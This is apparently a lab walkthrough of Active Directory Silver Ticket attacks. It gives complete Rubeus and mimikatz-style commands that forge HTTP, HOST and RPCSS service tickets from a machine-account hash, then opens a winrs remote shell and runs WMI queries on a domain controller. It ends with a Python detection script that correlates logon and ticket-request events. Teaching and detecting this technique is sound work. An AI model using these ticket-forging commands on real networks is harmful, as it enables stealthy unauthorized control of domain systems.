Active Directory (AD) | Exploiting Domain Admin (Silver Ticket Attack)
Designed to provide a comprehensive guide to Active Directory (AD) attack techniques
Introduction
A Silver Ticket attack allows attackers to gain unauthorized access to specific services in an Active Directory environment by forging service tickets (TGS tickets). Unlike the Golden Ticket attack, which compromises the entire domain, a Silver Ticket attack uses the hash of the service account (often a machine account) instead of the krbtgt hash held by the KDC. Because the forged ticket is presented directly to the service and no request is ever sent to the KDC, the attack is stealthier and harder to detect.
Importance of Silver Tickets
Silver Tickets enable attackers to access particular services, such as HTTP and WMI, without the domain controller ever seeing a ticket request, so the usual KDC-side logging (TGS request events) is never generated. This bypasses detections that rely on the KDC, making the technique a crucial one to understand and defend against when maintaining Active Directory security.
Understanding HTTP and WMI in This Context
HTTP (Hypertext Transfer Protocol): In the context of a Silver Ticket attack, the HTTP service class is the SPN used by WinRM, so a forged HTTP ticket for a domain controller lets an attacker open a remote shell (for example with winrs) or reach web-based management consoles and services hosted on the server, executing commands or retrieving information through them.
WMI (Windows Management Instrumentation): WMI is a set of specifications from Microsoft for consolidating the management of devices and applications in a network from Windows computing systems. By targeting WMI, an attacker can execute commands remotely, gather information about the system, and manage various aspects of the operating system.
Step 1: Creating a Silver Ticket for HTTP Service
The first step involves creating a Silver Ticket for the HTTP service on the domain controller. This requires the NTLM (RC4) hash of the domain controller's machine account (dcorp-dc$).
Generate the Silver Ticket:
Using Rubeus, we generate a Silver Ticket with the following command. The command specifies the service SPN (http/dcorp-dc...), the domain, the RC4 hash of the machine account, the domain SID, and the user to impersonate, and /ptt injects the resulting ticket into the current logon session.
C:\AD\Tools>Loader.exe -path C:\AD\Tools\Rubeus.exe -args "silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt"
Verify the Service Ticket:
Verify the generated ticket with Rubeus. Successful verification will show details such as the server name and client name.
C:\AD\Tools>Loader.exe -path C:\AD\Tools\Rubeus.exe -args "ptt"
Access the Domain Controller Using winrs:
Use Windows Remote Shell (winrs) to access the domain controller:
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Step 2: Creating a Silver Ticket for WMI Access
For WMI access, we need Silver Tickets for both the HOST and RPCSS services.
Generate a Ticket for HOST Service:
Use BetterSafetyKatz to create a Silver Ticket for the HOST service (the /endin and /renewmax values are ticket lifetime and maximum renewal time in minutes):
C:\AD\Tools>BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt"
Generate a Ticket for RPCSS Service:
Similarly, create a Silver Ticket for the RPCSS service:
C:\AD\Tools>BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt"
Verify the Tickets:
Check that the tickets are present in the current logon session using klist. You should see entries for both the RPCSS and HOST services of dcorp-dc.
C:\Windows\system32>klist
Execute WMI Commands:
With both tickets in place, run a WMI query against the domain controller. The output will include details about its operating system, confirming that the forged HOST and RPCSS tickets were accepted.
PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
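Both procedures above (the HTTP ticket used with winrs in Step 1 and the HOST/RPCSS tickets used with WMI in Step 2) share the same detection gap: the forged ticket is presented straight to dcorp-dc, so the domain controller never records a 4769 (TGS request) for it, yet the target host still records a 4624 network logon authenticated by Kerberos. The following Python script is an added example written for this page, not code from the guide or from Rubeus/mimikatz; it correlates 4624 events collected from the target with 4769 events collected from the domain controllers and flags Kerberos logons that no ticket request backs. All event records are constructed sample data with invented timestamps and addresses, and the field names follow the Windows Security log EventData names.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Default domain policy: service tickets live 10 hours. A legitimate 4624 must
# be preceded by a 4769 for the same user and target service within this window
# (or by a 4770 renewal, see the usage note).
MAX_TICKET_AGE = timedelta(hours=10)

# Constructed sample 4769 events as collected from the domain controllers.
# ServiceName is the account that owns the requested SPN, so a ticket for
# http/dcorp-dc or HOST/dcorp-dc shows up as the machine account DCORP-DC$.
DC_TGS_EVENTS = [
    {"EventID": 4769, "TimeCreated": "2024-05-01T08:01:12", "Computer": "dcorp-dc",
     "TargetUserName": "svcadmin@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "IpAddress": "172.16.100.2", "Status": "0x0"},
    # A request made 12 hours earlier is outside the ticket lifetime.
    {"EventID": 4769, "TimeCreated": "2024-04-30T21:10:00", "Computer": "dcorp-dc",
     "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "IpAddress": "172.16.100.51", "Status": "0x0"},
    # A failed request (non-zero Status) never produced a ticket.
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:00:00", "Computer": "dcorp-dc",
     "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "IpAddress": "172.16.100.51", "Status": "0x1b"},
]

# Constructed sample 4624 events as collected from the target host dcorp-dc.
TARGET_LOGON_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2024-05-01T08:03:40", "Computer": "dcorp-dc",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "svcadmin", "TargetDomainName": "dcorp", "IpAddress": "172.16.100.2"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:15:02", "Computer": "dcorp-dc",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "Administrator", "TargetDomainName": "dcorp", "IpAddress": "172.16.100.51"},
    # NTLM logons involve no Kerberos ticket and are out of scope for this check.
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:20:00", "Computer": "dcorp-dc",
     "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "backupsvc", "TargetDomainName": "dcorp", "IpAddress": "172.16.100.7"},
]


def parse_ts(value):
    """Parse the ISO-8601 timestamps used in the sample records."""
    return datetime.fromisoformat(value)


def index_tgs_requests(tgs_events):
    """Map (user, service host) -> sorted issue times of successful 4769 events."""
    index = defaultdict(list)
    for event in tgs_events:
        if event["EventID"] != 4769 or event.get("Status") != "0x0":
            continue
        user = event["TargetUserName"].split("@")[0].lower()
        service_host = event["ServiceName"].rstrip("$").lower()
        index[(user, service_host)].append(parse_ts(event["TimeCreated"]))
    for times in index.values():
        times.sort()
    return index


def find_unbacked_kerberos_logons(logon_events, tgs_events, max_age=MAX_TICKET_AGE):
    """Return 4624 Kerberos network logons on a host for which no domain
    controller issued a service ticket to that user within max_age."""
    index = index_tgs_requests(tgs_events)
    suspicious = []
    for event in logon_events:
        if event["EventID"] != 4624 or event["LogonType"] != "3":
            continue
        if event["AuthenticationPackageName"].lower() != "kerberos":
            continue
        user = event["TargetUserName"].lower()
        host = event["Computer"].lower()
        logged_on = parse_ts(event["TimeCreated"])
        issued_times = index.get((user, host), [])
        backed = any(logged_on - max_age <= issued <= logged_on for issued in issued_times)
        if not backed:
            suspicious.append(event)
    return suspicious


def describe(event):
    """One-line summary of a flagged logon for an alert or hunting report."""
    return (f"{event['TimeCreated']} {event['Computer']}: Kerberos logon of "
            f"{event['TargetDomainName']}\\{event['TargetUserName']} from "
            f"{event['IpAddress']} with no matching TGS request on any DC")


if __name__ == "__main__":
    for hit in find_unbacked_kerberos_logons(TARGET_LOGON_EVENTS, DC_TGS_EVENTS):
        print(describe(hit))
```

The check is only as good as the 4769 coverage: every domain controller's log must be in the input, and renewals (event 4770) extend a ticket beyond the 10-hour window, so in production either fold 4770 into the index or widen max_age toward the domain's maximum renewal time. Note that the mimikatz commands in Step 2 set /endin:600 and /renewmax:10080, which match the default 10-hour and 7-day policy, so the forged tickets' lifetimes look ordinary in klist and lifetime anomalies alone will not reveal them; the missing KDC request is the durable signal. Rotating the machine account password (dcorp-dc$) invalidates every ticket forged with the old hash.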